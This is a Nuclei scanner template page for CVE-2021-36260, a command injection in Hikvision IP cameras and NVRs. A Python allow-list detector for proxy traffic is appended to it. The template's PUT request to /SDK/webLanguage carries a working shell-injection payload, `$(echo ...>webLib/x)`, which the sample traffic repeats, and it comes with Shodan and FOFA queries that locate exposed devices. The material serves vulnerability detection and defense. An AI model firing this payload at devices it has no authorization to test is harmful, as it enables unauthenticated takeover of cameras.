Hikvision IP camera/NVR - Remote Command Execution
ID: CVE-2021-36260
Severity: critical
Author: pdteam,gy741,johnk3r
Tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
Description
Certain Hikvision products contain a command injection vulnerability in the web server due to insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
YAML Source
id: CVE-2021-36260

info:
  name: Hikvision IP camera/NVR - Remote Command Execution
  author: pdteam,gy741,johnk3r
  severity: critical
  description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.
  remediation: |
    Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.
  reference:
    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://github.com/Aiminsun/CVE-2021-36260
    - https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36260
    cwe-id: CWE-78
    epss-score: 0.97484
    epss-percentile: 0.99965
    cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hikvision
    product: ds-2cd2026g2-iu\/sl_firmware
    shodan-query: http.favicon.hash:999357577
    fofa-query: icon_hash=999357577
  tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
variables:
  string: "{{to_lower(rand_base(12))}}"

http:
  - raw:
      - |
        PUT /SDK/webLanguage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{string}}>webLib/x)</language>
      - |
        GET /x HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"
# digest: 490a0046304402202f72d422297c1ba5a3da0796b28fb20e869870a1094f16074b1c52e52cdb142502203432fe54bc4f5f68be72c6b3e4c4806c9f1690642a8f11da5765ba6366cfe5ae:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-36260.yaml"
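
For devices that cannot be patched immediately, the first request in the template shows what to watch for: a PUT to /SDK/webLanguage whose <language> element carries something other than a language code. The following is an added example, not part of the template or of Nuclei, of a check a reverse proxy or traffic-inspection script could apply to captured requests. The function names, the allow-list pattern for legitimate values, the body size limit and the sample traffic are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

ENDPOINT = "/SDK/webLanguage"   # request path taken from the template
MAX_BODY = 512                  # assumption: a real language update is tiny
# Assumption: a legitimate value is a short locale-like token ("en", "zh-CN").
SAFE_VALUE = re.compile(r"[A-Za-z]{2,12}(?:[-_][A-Za-z0-9]{2,8})?")

def language_value(body):
    """Return the text of the root <language> element, or None if the body
    is oversized, not well-formed XML, or has a different root element."""
    if len(body) > MAX_BODY:
        return None
    try:
        root = ET.fromstring(body.encode("utf-8"))
    except ET.ParseError:
        return None
    if root.tag != "language" or len(root):
        return None
    return (root.text or "").strip()

def inspect(method, path, body):
    """Classify one request as 'ignore', 'ok' or 'alert'."""
    if method.upper() != "PUT" or path.split("?", 1)[0] != ENDPOINT:
        return "ignore"
    value = language_value(body)
    if value is None or not SAFE_VALUE.fullmatch(value):
        return "alert"
    return "ok"

def scan(requests):
    """Return (client, body) for every request that should raise an alert."""
    return [(r["client"], r["body"]) for r in requests
            if inspect(r["method"], r["path"], r["body"]) == "alert"]

# Constructed sample traffic (documentation addresses, not real captures).
XML = '<?xml version="1.0" encoding="UTF-8"?>'
SAMPLES = [
    {"client": "192.0.2.10", "method": "PUT", "path": ENDPOINT,
     "body": XML + "<language>en</language>"},
    {"client": "198.51.100.7", "method": "PUT", "path": ENDPOINT,
     "body": XML + "<language>$(echo abcdefghijkl>webLib/x)</language>"},
    {"client": "198.51.100.7", "method": "GET", "path": "/x", "body": ""},
]

if __name__ == "__main__":
    for client, body in scan(SAMPLES):
        print(f"ALERT {client}: unexpected <language> value in {body!r}")
```

The check is an allow-list, so it also alerts on malformed or oversized bodies instead of trying to enumerate shell metacharacters.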